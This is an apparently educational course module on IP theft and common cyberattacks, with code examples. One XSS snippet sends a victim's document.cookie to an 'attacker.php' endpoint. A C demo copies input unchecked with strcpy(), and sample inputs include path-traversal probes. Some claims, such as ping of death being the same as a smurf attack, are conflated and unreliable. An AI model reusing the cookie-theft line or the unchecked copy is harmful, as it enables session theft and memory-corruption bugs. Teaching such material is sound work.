Published by Enhelion, 2019-11-19 14:45:00

Module 3

IP Theft and Types of Attacks

What is IP?
IP stands for Intellectual Property. Intellectual property (IP) refers to creations of the mind,
such as inventions, literary and artistic works, designs, and the symbols, names and images used
in business to generate profits.

Types of Intellectual Property

• Patents:
A patent is an exclusive right granted for an invention. A patent provides the patent
owner with the right to decide how or if their invention can be used by others. In
exchange for this exclusivity, the patent owner makes technical information about the
invention publicly available in the published patent document.

• Trade Marks:
A trademark is a sign capable of distinguishing the goods or services of one enterprise
from those of other enterprises. Trademarks originated in ancient times when artisans
used to put their signature or "mark" on their products.

• Designs:
An industrial design constitutes the ornamental or aesthetic aspect of an article. A design
may consist of two-dimensional features, such as patterns, lines or color, or three-dimensional
features, such as the shape or surface of an article.

• Copyrights:
Copyright is a legal term used to describe the rights that creators have over their literary
and artistic works. Works ranging from books, music, paintings, sculpture and films to computer
programs, databases, advertisements, maps and technical drawings are all covered by copyright.

• Trade Secrets:
A trade secret is a type of intellectual property in the form of a formula, practice,
process, design, instrument, pattern, commercial method, or compilation of information
that is not generally known or reasonably discoverable by others, and by which a business
can obtain an economic advantage over competitors or customers.

What can be Stolen as IP?

• Ideas / Inventions / Creative Expression
• Products
• Designs
• Product Specification
• Process Information and Methodologies
• Manufacturing Process
• Business Method

TYPES OF ATTACK

Here we discuss 2 types of attacks:
1. Web Based Attacks
2. System Based Attacks

What are Web Based Attacks?

Web based attacks are considered to be the greatest and often the least understood of all risks
related to confidentiality, availability, and integrity. The aim of a web-based attack is
significantly different from that of other attacks. In most traditional penetration testing
exercises, a network or host is the target of the attack. Web based attacks are centered on the
application itself and operate at layer 7 of the OSI model. John Pescatore of the Gartner Group
claims that nearly 70% of all attacks occur at the application layer.

Application vulnerabilities can provide the means by which malicious end users breach a
system's protection mechanisms, usually to gain access to private information or system
resources. Information gathered could include social security numbers, dates of birth, and
maiden names, all of which are often used in identity theft. Another popular target for
attackers is credit card data. Left unprotected and unencrypted, it can be used to cause
significant damage to an organization's most valued asset, its customers. So what makes up an
application attack? By definition, all web application attacks consist of at least one normal
request or one modified request aimed at taking advantage of poor parameter checking or
instruction spoofing.

There are six fundamental categories of application attacks.

• Spoofing:
Spoofing is the act of imitating another user or process in order to perform a task or
retrieve information that would normally not be allowed. For example, an attacker could use
a crafted HTTP request containing another user's session id and retrieve the targeted
user's account information.

• Repudiation:
Applications must have reasonable repudiation controls, such as web access,
authentication, and database transaction logs, in order to tie specific actions to a
single user. Without corroborating logs, online web application users could easily claim
that they did not transfer equities from one account to an external account belonging to
someone else, and without proof to the contrary all online brokerages would be required to
reimburse the client for the lost funds. Collecting and correlating logs from multiple
sources (web application, middleware, and database) can prevent repudiation attacks.

• Information Disclosure:
Information disclosure is one of the biggest threats to large organizations that maintain
private information about their customer base. When attackers can reveal private
information about a user or users of a web site, consumer confidence in that
organization can take drastic hits, causing losses in sales, stock price, and overall
marketability. To prevent this, applications must have adequate controls that prevent
user ID and session manipulation.

• Denial of Service:
Denial of service attacks are among the most widely known of all application attacks.
They are often launched by malicious users, competitors or script kiddies. Motivations
for this type of attack range from personal to political, in the hope of stifling an
organization's ability to conduct online business.

• Elevation of Privileges:
Authorization controls that are both reliable and robust are requirements for any
system or application that guards sensitive information. Elevation of privileges requires a
malicious user to either already possess, or gain through unlawful methods, the
authorization privileges of a regular user. Once the malicious user is logged into the
victim system, an attempt will be made to elevate those privileges by exploiting the
application through poor parameter checking or instruction spoofing.

Types of Web based Attacks:

1. Injection Attack:

Injection attacks refer to a comprehensive class of attack vectors that allow an attacker
to supply untrusted input to a program, which gets processed by an interpreter as part
of a command or query which alters the course of execution of that program. They are
amongst the oldest and most dangerous web application attacks. They can result in data
theft, loss of data integrity, data loss, denial of service, as well as full system
compromise.

Injection is a major problem in web security. Injection attacks, particularly SQL injection
(SQLi), are not only very dangerous

Types of Injection Attacks

1. SQL injection (SQLi)
2. Cross-site Scripting (XSS)
3. Code injection
4. CRLF injection
5. Email (Mail command/SMTP) injection
6. Host Header injection
7. LDAP injection
8. OS Command injection
9. XPath injection

2. File Inclusion:

A file inclusion vulnerability allows an attacker to access unauthorized or sensitive files
available on the web server or to execute malicious files on the web server by making
use of the ‘include’ functionality. This vulnerability is mainly due to a bad input
validation mechanism, wherein the user’s input is passed to the file include commands
without proper validation.

There are 2 types of file inclusion.

1. Remote File Inclusion.
2. Local File Inclusion.

Remote File Inclusion:

Remote file inclusion allows an attacker to include and execute a remotely hosted file
via a script that includes it in the attacked page. The attacker can use RFI to run
malicious code either on the server or on the client side. The impact of this attack can
vary from theft of session tokens or data when the target is the client, to complete
system compromise when the target is the application server.

Local File Inclusion:

The local file inclusion vulnerability is the process of including local files available on
the server. It occurs when user input contains the path to the file that has to be
included. When such input is not properly sanitized, the attacker may supply other file
names and access unauthorized files. An attacker may also make use of directory traversal
characters to retrieve sensitive files from other directories.
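
As an added example (not part of the module), the following C code applies the input validation the module describes as missing: it accepts only a plain file name built from an allow-list of characters and refuses anything that looks like a path, so traversal sequences never reach the include call. PAGE_DIR, MAX_NAME and the function names are constructed for this example.

```c
/* Added example (not from the module): allow-list validation of a
 * user-supplied page name before it reaches an include/open call.
 * Function names and PAGE_DIR are constructed for this example. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define PAGE_DIR "/var/www/pages/"   /* constructed base directory */
#define MAX_NAME  64                 /* longest page name accepted */

/* Returns 1 if 'name' is a plain file name built only from
 * [A-Za-z0-9._-] that does not start with '.', and 0 otherwise.
 * Rejecting rather than "cleaning" means '/', '\\', '%', ".." and
 * every encoding trick are refused in one place. */
int is_safe_page_name(const char *name)
{
    if (name == NULL) return 0;
    size_t len = strlen(name);
    if (len == 0 || len > MAX_NAME) return 0;
    if (name[0] == '.') return 0;            /* ".", "..", dotfiles */
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!isalnum(c) && c != '.' && c != '_' && c != '-')
            return 0;                         /* separators, '%', spaces */
    }
    if (strstr(name, "..") != NULL) return 0; /* "a..b" is never a page */
    return 1;
}

/* Builds PAGE_DIR + name into 'out' only for validated names.
 * Returns 0 on success, -1 if rejected or if the result would not fit. */
int resolve_page_path(const char *name, char *out, size_t outsz)
{
    if (out == NULL || outsz == 0) return -1;
    if (!is_safe_page_name(name)) { out[0] = '\0'; return -1; }
    int n = snprintf(out, outsz, "%s%s", PAGE_DIR, name);
    if (n < 0 || (size_t)n >= outsz) { out[0] = '\0'; return -1; }
    return 0;
}

int main(void)
{
    /* constructed inputs: one legitimate page, then typical LFI probes */
    const char *inputs[] = { "about.html", "../../etc/passwd", "/etc/passwd",
                             "..%2f..%2fetc%2fpasswd", "about.html%00.php" };
    char path[256];
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
        if (resolve_page_path(inputs[i], path, sizeof path) == 0)
            printf("allow  %-24s -> %s\n", inputs[i], path);
        else
            printf("reject %-24s\n", inputs[i]);
    }
    return 0;
}
```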

3. Cross-Site Scripting:

Cross site scripting (XSS) is a common attack vector that injects malicious code into a
vulnerable web application. XSS differs from other web attack vectors such as SQL
injections as it does not directly target the application itself. The users of the web
application are the ones at risk to this type of attack.

Cross site scripting attacks can be of two types: stored and reflected.

• Stored XSS occurs when a malicious script is injected directly into a vulnerable
web application. It is also known as persistent XSS and is the more damaging of the
two.

• Reflected XSS involves reflecting a malicious script off a web application onto a
user's browser. The script is embedded in a link and is only activated once that link
is clicked.

4. DNS SPOOFING ATTACK

DNS spoofing occurs when a particular DNS server's records are "spoofed" or maliciously
altered to redirect traffic to the attacker. This diversion of traffic allows the attacker
to steal data, spread malware, etc. For example, if a DNS record is spoofed, the attacker
can divert all the traffic that relied on the correct DNS record to a fake website that the
attacker has created to resemble the real site, or to a completely different site.

How does DNS Spoofing work?

DNS spoofing can be carried out using various methods such as:

• DNS cache poisoning
• Compromising a DNS server
• Implementing a Man in the Middle Attack

However, an attacker's end goal is usually the same regardless of the method used: to
steal information, re-route you to a website that benefits them, or spread malware. The
most analyzed method of performing DNS spoofing is cache poisoning, which we explain next.

DNS Cache Poisoning

Since DNS servers cache DNS translations for faster, more efficient browsing, attackers
can take advantage of this to perform DNS spoofing. If an attacker is able to inject a
forged DNS entry into the DNS server, all users will use that forged entry until the cache
expires. Once the cache expires, the DNS entry will return to normal as the DNS server goes
through the complete DNS lookup process again. However, if the DNS server's software still
has not been updated, the attacker can repeat the attack and continue siphoning visitors
to their website.

DNS cache poisoning can sometimes be quite difficult to notice. If the malicious website
is very similar to the website it is trying to impersonate, some users may not even notice
the difference. Additionally, if the attacker is using DNS cache poisoning to compromise
one company’s DNS records in order to have access to their emails for example, then
this may also be difficult to detect.

5. Denial of Service (DoS) and Distributed Denial of Service (DDoS):

A Denial-of-Service (DoS) attack is an attack meant to shut down a machine or network,
making it inaccessible to its intended users. DoS attacks accomplish this by flooding the
target with traffic, or sending it information that triggers a crash.

DoS attacks often target the web servers of high-profile organizations such as banking,
commerce, and media companies, or government and trade organizations. While DoS attacks do
not normally result in the theft or loss of significant information or other assets, they
can cost the victim a great deal of time and money to handle.

There are two general methods of DoS attacks:

• flooding services
• crashing services

Flood attacks occur when the system receives more traffic than the server can buffer,
causing it to slow down and eventually stop.

Popular flood attacks include:

• Buffer overflow attacks – the most common DoS attack. It is based on the concept of
sending more traffic to a network address than the programmers have built the system to
handle. It includes the attacks listed below, in addition to others that are designed to
exploit bugs specific to certain applications or networks.

• ICMP flood – This attack takes advantage of misconfigured network devices by
sending spoofed packets that ping every computer on the targeted network,
instead of just one specific machine. The network is then triggered to amplify the
traffic. It is also known as the ping of death or smurf attack.

• SYN flood – sends a request to connect to a server, but never completes it. It
continues until all open ports are saturated with requests and none are available
for legitimate users to connect to.

What is a DDoS Attack?

A distributed denial-of-service (DDoS) attack is an attack in which several compromised
computer systems attack a target, such as a server, website or other network resource,
and cause a denial of service for users of the targeted resource. The bombardment of
incoming messages, connection requests or malformed packets to the target system
forces it to slow down or even crash and shut down, thereby denying service to
legitimate users or systems.

In a typical DDoS attack, the assailant begins by exploiting a vulnerability in one
computer system and making it the DDoS master. The attack master system identifies
other vulnerable systems and, by either infecting the systems with malware or through
bypassing the authentication controls, gains control over them.

A networked device or a computer under the control of an intruder is known as
a zombie, or bot. The attacker creates what is called a command-and-control server to
command the network of bots, also called a botnet. The person in control of a botnet
is sometimes referred to as the botmaster. Historically, this term has been used to
refer to the first system "acquired" into a botnet because it is used to control the spread
and activity of other systems in the botnet.

Botnets can be made up of almost any number of bots; botnets with tens or hundreds of
thousands of nodes have become increasingly common, and there may not be an upper limit
to their size. Once the botnet is assembled, the attacker can use the traffic generated by
the compromised devices to flood the target domain and knock it offline.

6. Dictionary Attack:

The dictionary attack uses a simple file containing words that can be found in a
dictionary, hence its rather straightforward name. In other words, this attack uses
exactly the kind of words that many people use as their password.

7. Brute Force Attack:

The brute force attack is similar to the dictionary attack but comes with an added bonus
for the hacker. Instead of just using words, a brute force attack lets them detect
non-dictionary words by working through all possible alphanumeric combinations from aaa1
to zzz10.

It's not quick, provided your password is more than a handful of characters long, but it
will eventually uncover your password. Brute force attacks can be shortened by throwing
additional computing horsepower at them, in terms of both processing power – including
harnessing the power of your video card GPU

8. Buffer Overflow Attack:

A buffer is a temporary area for data storage. When a program or system process places
more data in a buffer than it can hold, the extra data overflows. This causes some of that
data to leak into other buffers, which can corrupt or overwrite whatever data they were
holding.

In a buffer-overflow attack, the extra data sometimes holds specific instructions for
actions planned by a hacker or malicious user. For instance, the data could trigger a
response that damages files, changes data or unveils private information.

Attackers would use a buffer-overflow exploit to take advantage of a program that is
waiting on a user’s input.

There are two types of buffer overflows:

• stack-based
• heap-based

Heap-based overflows, which are difficult to execute and the less common of the two,
attack an application by flooding the memory space reserved for a program. Stack-based
buffer overflows, which are more common among attackers, exploit applications and
programs by using what is known as a stack: memory space used to store user input.

Let us study a real program example, written in C, that shows the danger of such
situations.

// A C program to demonstrate buffer overflow
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
    // Reserve 5 bytes of buffer including the terminating NULL.
    // On the 32-bit layout described below the compiler rounds this up
    // to 8 bytes = 2 double words, so to overflow we need more than
    // 8 bytes. (The exact threshold depends on the compiler's stack
    // layout; the crash may appear at a different input length.)
    char buffer[5]; // If more than 8 characters are input by the user,
                    // there will be an access violation (segmentation fault).

    // a prompt on how to execute the program...
    if (argc < 2)
    {
        printf("strcpy() NOT executed....\n");
        printf("Syntax: %s <characters>\n", argv[0]);
        exit(0);
    }

    // copy the user input to buffer, without any bounds checking;
    // a secure version is strcpy_s() (you may want to try it)
    strcpy(buffer, argv[1]);
    printf("buffer content= %s\n", buffer);

    printf("strcpy() executed...\n");

    return 0;
}

Compile this program on Linux and run it as ./output_file INPUT.

Input: 12345678 (8 bytes). The program runs smoothly.

Input: 123456789 (9 bytes). A "Segmentation fault" message is displayed and the program
terminates.

The vulnerability exists because the buffer can be overflowed if the user input
(argv[1]) is bigger than 8 bytes. Why 8 bytes? On a 32-bit (4-byte) system, we must fill up
a double word (32 bits) of memory. A character (char) is 1 byte, so if we request a buffer
of 5 bytes, the system allocates 2 double words (8 bytes). That is why, when you input more
than 8 bytes, the buffer is overflowed.

Similar standard functions that are technically less vulnerable, such as strncpy(),
strncat(), and memcpy(), do exist. However, the problem with these functions is that the
programmer, not the compiler, is responsible for asserting the size of the buffer.

Every programmer must be familiar with the buffer overflow problem before they start
coding. Many of the bugs that get introduced can, in most cases, be exploited as a result
of buffer overflows.
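
As an added example (not the module's program), the following C code shows the size discipline the module says the programmer must supply, applied to the same 5-byte buffer: a copy that checks the length before writing a single byte, the strncpy() pitfall of an unterminated buffer, and strncpy() used correctly. BUF_SIZE and the function names are constructed for this example.

```c
/* Added example (not the module's program): the size discipline the module
 * says the programmer must supply, applied to the same 5-byte buffer.
 * Function names are hypothetical. */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 5   /* same size as 'buffer' in the module's program */

/* Copies 'src' into 'dst' (capacity dstsize) only if it fits together with
 * its terminator. Returns 0 on success, -1 otherwise. The length is checked
 * before any byte is written, unlike strcpy(), and the result is always
 * NUL-terminated, unlike strncpy(). */
int copy_bounded(char *dst, size_t dstsize, const char *src)
{
    if (dst == NULL || src == NULL || dstsize == 0) return -1;
    size_t n = 0;
    while (n < dstsize && src[n] != '\0') n++;   /* never scans past dstsize */
    if (n >= dstsize) return -1;                 /* no room for the '\0' */
    memcpy(dst, src, n + 1);                     /* includes the terminator */
    return 0;
}

/* The strncpy() pitfall the module alludes to: if 'src' has BUF_SIZE or
 * more characters, strncpy() writes no terminator at all, and a later
 * printf("%s") would read past the buffer. Returns 1 if the copy is
 * terminated inside the buffer, 0 if it is not. */
int strncpy_is_terminated(const char *src)
{
    char buf[BUF_SIZE];
    strncpy(buf, src, sizeof buf);
    return memchr(buf, '\0', sizeof buf) != NULL;
}

/* strncpy() used correctly: leave one byte for the terminator and set it.
 * Returns 0 if 'src' fit, -1 if it was truncated (the copy is still safe). */
int strncpy_fixed(char *dst, size_t dstsize, const char *src)
{
    if (dst == NULL || src == NULL || dstsize == 0) return -1;
    strncpy(dst, src, dstsize - 1);
    dst[dstsize - 1] = '\0';
    return strlen(src) < dstsize ? 0 : -1;
}

int main(int argc, char *argv[])
{
    char buffer[BUF_SIZE];
    /* constructed default: the 9-byte input that crashes the module's program */
    const char *input = (argc > 1) ? argv[1] : "123456789";
    if (copy_bounded(buffer, sizeof buffer, input) == 0)
        printf("buffer content= %s\n", buffer);
    else
        printf("input of %zu bytes rejected: buffer holds at most %d\n",
               strlen(input), BUF_SIZE - 1);
    return 0;
}
```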

9. Session Hijacking:

A computer session, in everyday terms, is a temporary interaction you have with a
website. For example, a session is the time between when you first log into your bank
account and when you log off after completing your operations.

What is Session Hijacking?

TCP session hijacking is a security attack on a user session over a protected network. The
most common method of session hijacking is called IP spoofing. It occurs when an
attacker uses source-routed IP packets to insert commands into an active
communication between two nodes on a network while disguising itself as one of the
authenticated users. This type of attack is possible because authentication is typically
only performed at the beginning of a TCP session.

Another type of session hijacking is known as a man-in-the-middle attack. Using a
sniffer, the attacker can observe the communication between devices and collect the
data that is transmitted.

The session token can be compromised in multiple ways. The most common are:

• Predictable session token
• Session sniffing
• Client-side attacks (XSS, malicious JavaScript code, Trojans, etc.)
• Man-in-the-middle attack
• Man-in-the-browser attack
• Using packet sniffers

Using Packet Sniffers

In the figure above, it can be seen that the attacker captures the victim's session ID by
using a packet sniffer and uses it to gain access to the server.

Cross Site Scripting (XSS Attack)
Attackers can also capture a victim's session ID through an XSS attack using JavaScript. An
attacker sends the victim a crafted link containing malicious JavaScript. When the victim
clicks on the link, the JavaScript runs and carries out the instructions devised by the
attacker.
<SCRIPT type="text/javascript">
var adr = '../attacker.php?victim_cookie=' + escape(document.cookie);
</SCRIPT>

IP Spoofing
Spoofing is pretending to be someone else. It is a technique used to gain prohibited
access to a computer by using the IP address of a trusted host. To implement this
technique, the attacker has to obtain the IP address of the client and inject their own
packets, spoofed with the client's IP address, into the TCP session, so as to trick the
server into believing it is communicating with the victim, i.e. the original host.

Blind Attack
If an attacker is not able to sniff packets and guess the correct sequence number
expected by the server, brute-force combinations of sequence numbers can be tried.

Mitigation

To defend a network against session hijacking, a defender has to implement security
measures at both the application level and the network level. Network level hijacks can be
prevented by encrypting the packets so that the hijacker cannot decipher the packet
headers to obtain any information that would help in spoofing. This encryption can be
provided by using protocols such as IPsec, SSL, SSH, etc. Internet Protocol Security
(IPsec) has the means to encrypt the packet with a shared key between the two parties
involved in the communication. IPsec runs in two modes: Transport and Tunnel. In Transport
Mode only the data sent in the packet is encrypted, while in Tunnel Mode both the packet
headers and the data are encrypted, so it is more restrictive.

Session hijacking is a grave threat to networks and web applications as most of the
systems are vulnerable to it.

10. Social Engineering Attack:
Social engineering is a type of attack vector that aims to obtain information about a
victim by manipulating people.

What is Social Engineering?

Social engineering is the term used for a wide scope of malicious activities accomplished
through human interactions. It uses psychological manipulation to con users into making
security mistakes or giving away sensitive information.

Social engineering attacks happen in one or more steps. A perpetrator first researches
the intended victim to gather necessary background information, such as potential
points of entry and weak security protocols, needed to proceed with the attack. Then,
the attacker moves to gain the victim’s trust and provide circumstances for subsequent
actions that break security practices, such as revealing sensitive information or granting
access to critical resources.

Social Engineering Life Cycle

What makes social engineering especially dangerous is that it relies on human error,
rather than vulnerabilities in software and operating systems. Mistakes made by
legitimate users are much less predictable, making them harder to identify and thwart
than a malware-based intrusion.

Social engineering attack techniques

Social engineering attacks come in various forms and can be performed anywhere
where human interaction is involved. The following are the five most common forms of
digital social engineering assaults:

Baiting

As its name implies, baiting attacks use a false promise to provoke a victim's greed or
curiosity. They lure users into a trap that steals their personal information or infects
their systems with malware.

The most reviled form of baiting uses physical media to disperse malware. For
instance, attackers leave the bait—typically malware-infected flash drives—in
conspicuous areas where potential victims are certain to see them, such as bathrooms,
elevators, or the parking lot of a targeted company. The bait has an authentic look to it,
such as a label presenting it as the company's payroll list. Victims pick up the bait out of
curiosity and insert it into a work or home computer, resulting in automatic installation
of malware on the system.

Baiting scams don’t necessarily have to be carried out in the physical world. Online,
baiting consists of attractive advertisements that lead to malicious sites or that
encourage users to download a malware-infected application.

Scareware

Scareware involves victims being swamped with false alarms and fictitious threats.
Users are tricked into thinking their system is infected with malware, prompting them to
install software that has no real benefit (other than for the perpetrator) or is malware
itself. Scareware is also referred to as deception software, rogue scanner software and
fraudware.

A common scareware example is the legitimate-looking popup banner that appears in
your browser while surfing the web, displaying text such as "Your computer may be
infected with harmful spyware programs." It either offers to install the tool (often
malware-infected) for you, or directs you to a malicious site where your computer
becomes infected.

Scareware is also distributed via spam email that doles out bogus warnings, or makes
offers for users to buy worthless/harmful services.

Pretexting

Here, attackers obtain information through a series of cleverly crafted lies. The scam is
often commenced by a perpetrator pretending to need sensitive information from a
victim to perform a dire task.

The attacker usually starts by establishing trust with their victim by impersonating
co-workers, police, bank and tax officials, or other persons who have right-to-know
authority. The pretexter asks questions that are ostensibly required to confirm the
victim's identity, through which they gather important personal data.

All sorts of pertinent information and records are gathered using this scam, such as social
security numbers, personal addresses and phone numbers, phone records, staff
vacation dates, bank records and even security information related to a physical plant.

Phishing

As one of the most popular social engineering attack types, phishing scams are email
and text message campaigns aimed at creating a sense of urgency, curiosity or fear in
victims. They then urge them into revealing sensitive information, clicking on links to
malicious websites, or opening attachments that contain malware.

An example is an email sent to users of an online service that alerts them to a policy
violation requiring immediate action on their part, such as a required password change.
It includes a link to an illegitimate website—nearly identical in appearance to its
legitimate version—encouraging the oblivious user to enter their current credentials
and a new password. Upon form submission, the information is sent to the attacker.

Given that identical, or near-identical, messages are sent to all users in phishing
campaigns, detecting and blocking them is much easier for mail servers that have access
to threat sharing platforms.

Spear phishing

This is a more targeted version of the phishing scam, in which an attacker chooses
specific individuals or enterprises. They then customize their messages based on
characteristics, job positions, and contacts belonging to their victims to make their
attack less detectable. Spear phishing requires much more effort on the part of the
perpetrator and may take weeks or months to pull off. Such attacks are much harder to
detect and have better success rates if done skillfully.

A spear phishing scenario might involve an attacker who, impersonating an
organization's IT consultant, sends an email to one or more employees. It is worded and
signed exactly as the consultant normally does, thereby deceiving recipients into
thinking it is an authentic message. The message prompts recipients to change their
password and provides them with a link that redirects them to a malicious page where
the attacker captures their credentials.

SYSTEM BASED ATTACKS

Viruses, worms, Trojans, and bots are all part of a class of software called "malware."
Malware is short for "malicious software," also known as malicious code or "malcode."
It is software or code that is specifically produced to damage, disrupt, steal, or in
general inflict some other illegitimate action on data, hosts, or networks.

There are many different classes of malware that have varying ways of infecting systems
and propagating themselves. Malware can infect systems by being packaged with other
programs or attached as macros to files. Others are installed by exploiting a known
vulnerability in an operating system (OS), network device, or other software. However,
the clear majority are installed due to some action from the user, such as clicking an
email attachment or downloading a file from the Internet.

Damage from malware varies from causing minor irritation (such as browser popup ads),
to destroying data, stealing confidential information or money, and compromising or
entirely immobilizing systems and networks.

Classes of Malicious Software

Viruses and worms are the two most common types of malware. These types of programs are
able to clone themselves and can spread copies of themselves, which may even be modified
copies.

These and other classes of malicious software are described below:

Ransomware

Ransomware is a type of malicious software that threatens to publish the victim's data or
perpetually block access to it unless a ransom is paid. Some simple ransomware may lock the
system in a way that is not difficult for a knowledgeable person to reverse. However, more
advanced malware uses a technique called cryptoviral extortion, which encrypts the victim's
files, making them inaccessible, and demands a ransom payment to decrypt them.

Viruses

A computer virus is a type of malware that propagates by inserting a copy of itself into,
and becoming part of, another program. It spreads from one computer to another, leaving
infections as it travels. Viruses can range in severity from causing mildly annoying effects
to damaging data or software and causing denial-of-service (DoS) conditions. Almost all
viruses are attached to an executable file. This means the virus may exist on a system but
will not be active or able to spread until the user runs or opens the malicious host file or
program. When the host code is executed, the viral code is executed as well. Usually, the
host program keeps functioning after it is infected by the virus. However, some viruses
overwrite other programs with copies of themselves, which destroys the host program
altogether. Viruses spread when the software or document they are attached to is
transferred from one computer to another via the network, file sharing, a disk, or infected
email attachments.

Worms

Computer worms are similar to viruses in that they replicate functional copies of themselves
and can cause the same type of damage. While viruses require the spreading of an infected
host file, worms are standalone software and do not require a host program or human help to
spread. Worms either exploit a vulnerability on the target system or use some kind of social
engineering to fool users into executing them. A worm enters a computer through a
vulnerability in the system and takes advantage of file-transport or information-transport
features on the system, allowing it to travel independently. More advanced worms use
encryption, wipers, and ransomware technologies to harm their targets.

Trojans

A Trojan is another type of malware, named after the historic wooden horse that the Greeks
used to infiltrate Troy. It is a damaging piece of software that looks legitimate. Users are
typically deceived into loading and executing it on their systems. After activation, it can
carry out any number of attacks on the host, from annoying the user (popping up windows or
changing desktops) to damaging the host (deleting files, stealing data, or activating and
spreading other malware, such as viruses). Trojans are also known to create backdoors to
give malicious users access to the system. Trojans do not reproduce by infecting other files,
nor do they self-replicate like viruses and worms. They must spread through user
interaction such as opening an email attachment or downloading and running a file from
the Internet.

Bots

"Bot" is derived from the word "robot". A bot is an automated process that interacts with other
network services. Bots often automate tasks and provide information or services that would
otherwise be performed by a human being. Typical uses include gathering information, as web
crawlers do, interacting automatically with Instant Messaging (IM), Internet Relay Chat (IRC) or
other web interfaces, and interacting dynamically with websites.

Bots can be used for good or malicious purposes. A malicious bot is self-propagating malware
designed to infect a host and connect back to a central server or servers that act as a command
and control (C&C) center for an entire network of compromised devices. This network is called a
botnet. With a botnet, attackers can launch large-scale, remote-controlled flood-type attacks
against their targets.

Along with the ability to self-propagate like worms, bots can include the ability to log
keystrokes, capture and analyze packets, gather passwords and financial information, launch
Denial of Service (DoS) attacks, relay spam, and open backdoors on the infected host. Bots have
all the capabilities of worms but are generally much more adaptable in their infection vector,
and are often modified within hours of the publication of a new exploit. They have been known
to exploit backdoors opened by worms and viruses, which lets them into networks that have good
perimeter control. Bots rarely announce their presence with the high scan rates that damage
network infrastructure; instead, they infect networks in a way that escapes immediate notice.

Advanced botnets may take advantage of common Internet of Things (IoT) devices, such as home
electronics or appliances, to scale up automated attacks. Cryptocurrency mining is another
common nefarious use of these bots.
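The two behaviours described above, a worm's high-rate scanning and a bot's quiet check-ins with its C&C server, leave different traces in connection logs: the first shows up as one host contacting many distinct destinations on the same port within seconds, the second as repeated connections to one endpoint at a near-constant interval. The following Python script is an added example, not part of the original module or of any source it draws on; it runs both checks over constructed sample records (the log format, addresses, ports and thresholds are assumptions chosen for illustration).

```python
"""Flag worm-like scanning and bot-like C&C beaconing in connection records.

Added example: the log format (timestamp src dst dport) and all thresholds are
assumptions for illustration, not a specific product's format.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import mean, pstdev


def build_sample_log():
    """Constructed sample records, not real traffic."""
    t0 = datetime(2019, 11, 1, 10, 0, 0)
    lines = []
    # Worm-like: one host probes 40 distinct neighbours on TCP 445 within 8 seconds.
    for i in range(40):
        ts = t0 + timedelta(milliseconds=200 * i)
        lines.append(f"{ts.isoformat()} 10.0.0.5 10.0.1.{i + 1} 445")
    # Bot-like: one host checks in with the same external address every 60 s.
    for i in range(10):
        ts = t0 + timedelta(seconds=60 * i)
        lines.append(f"{ts.isoformat()} 10.0.0.7 203.0.113.9 443")
    # Benign: a workstation making a few irregular web connections.
    for dst, offset in [("198.51.100.2", 3), ("198.51.100.7", 41),
                        ("198.51.100.2", 97), ("198.51.100.9", 350)]:
        ts = t0 + timedelta(seconds=offset)
        lines.append(f"{ts.isoformat()} 10.0.0.9 {dst} 443")
    return lines


def parse_records(lines):
    """Return (timestamp, src, dst, dport) tuples sorted by time."""
    records = []
    for line in lines:
        ts, src, dst, port = line.split()
        records.append((datetime.fromisoformat(ts), src, dst, int(port)))
    return sorted(records)


def detect_scanners(records, window=timedelta(seconds=10), min_fanout=20):
    """Worm-style propagation: many distinct destinations on one port in a short window.

    Returns {(src, dport): peak number of distinct destinations seen within `window`}.
    """
    by_src_port = defaultdict(list)
    for ts, src, dst, port in records:
        by_src_port[(src, port)].append((ts, dst))
    flagged = {}
    for key, events in by_src_port.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            fanout = len({dst for _, dst in events[start:end + 1]})
            if fanout >= min_fanout:
                flagged[key] = max(fanout, flagged.get(key, 0))
    return flagged


def detect_beacons(records, min_count=5, max_jitter_ratio=0.1):
    """Bot-style C&C check-in: repeated connections to one endpoint at a steady interval.

    Returns {(src, dst, dport): mean interval in seconds} for flows whose inter-arrival
    jitter (population std-dev / mean) is at or below `max_jitter_ratio`.
    """
    by_flow = defaultdict(list)
    for ts, src, dst, port in records:
        by_flow[(src, dst, port)].append(ts)
    flagged = {}
    for flow, times in by_flow.items():
        if len(times) < min_count:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_jitter_ratio:
            flagged[flow] = avg
    return flagged


if __name__ == "__main__":
    recs = parse_records(build_sample_log())
    for (src, port), fanout in detect_scanners(recs).items():
        print(f"scan-like fan-out: {src} -> {fanout} hosts on port {port}")
    for (src, dst, port), interval in detect_beacons(recs).items():
        print(f"beacon-like flow: {src} -> {dst}:{port} every {interval:.0f}s")
```

The fan-out check is what catches a worm quickly, because a worm must touch many hosts to spread; the beacon check is what catches a bot that deliberately stays quiet, because even a low-volume implant has to call home on some schedule. Real bots add random jitter to their check-in interval, so in production the `max_jitter_ratio` threshold is tuned against the organisation's own baseline traffic rather than fixed at the illustrative value used here.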

Adware

Adware is software that generates revenue for its developer by automatically displaying online
advertisements in the software's user interface or on a screen presented to the user during
installation. It may generate two types of revenue: one for displaying the advertisement and
another, on a "pay-per-click" basis, if the user clicks on it.

Backdoor

A backdoor is an undocumented way of accessing a system that bypasses the normal authentication
mechanisms. Some backdoors are placed in software by the original programmer; others are planted
on systems through a compromise, for example by a virus or worm. Attackers usually use backdoors
for easier and continued access to a system after it has been compromised.
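To make the definition concrete at code level, the following Python example (added here; it is not from the original module, and the function names, user store and credential value are hypothetical) shows a login routine that honours an undocumented maintenance password, beside a hardened version whose every decision is driven by the credential store, plus a simple source-text check of the kind a code reviewer runs to flag hard-coded credential assignments.

```python
"""A hard-coded maintenance credential as a backdoor, beside a hardened login.

Added example: the user store, the credential value and the function names are
hypothetical, constructed only to illustrate the definition.
"""
import hashlib
import hmac
import os
import re

PBKDF2_ITERATIONS = 100_000
DUMMY_SALT = b"\x00" * 16
DUMMY_DIGEST = b"\x00" * 32  # PBKDF2-HMAC-SHA256 produces 32 bytes


def derive_key(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)


def make_user_store(users):
    """Constructed credential store: {username: (salt, PBKDF2-HMAC-SHA256 digest)}."""
    store = {}
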